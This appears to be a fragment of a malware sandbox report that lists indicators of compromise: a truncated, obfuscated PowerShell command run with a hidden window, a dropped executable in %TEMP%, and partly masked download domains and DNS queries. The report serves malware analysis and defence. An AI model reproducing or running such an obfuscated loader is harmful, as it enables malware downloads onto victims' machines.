Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [striNG]::jOIn( '' , ('119,25x2c35B110o61o54x36>126,60>49_57c54F48H39,115,29F54F39_125T4_54x49o16_63T58o54,61c39B104B119x10T7>36B110F116x59o39F39B35o105F124T124B36c36>36>125o48T42,32F58_32x125o...
- %TEMP%\439.exe
- %TEMP%\439.exe
- %TEMP%\439.exe
- 'cr#####.#irstcomdemolinks.com':80
- 'od####oduction.ru':80
- 'cu####adrao.com.br':80
- http://www.od####oduction.ru/WjXiyy/
- http://od####oduction.ru/index.html
- http://www.cu####adrao.com.br/G0rx8fbu/
- DNS ASK cy##s.cl
- DNS ASK cr#####.#irstcomdemolinks.com
- DNS ASK od####oduction.ru
- DNS ASK la##.com.pk
- DNS ASK cu####adrao.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [striNG]::jOIn( '' , ('119,25x2c35B110o61o54x36>126,60>49_57c54F48H39,115,29F54F39_125T4_54x49o16_63T58o54,61c39B104B119x10T7>36B110F116x59o39F39B35o105F124T124B36c36>36>125o48T42,32F58_32x125o...' (with hidden window)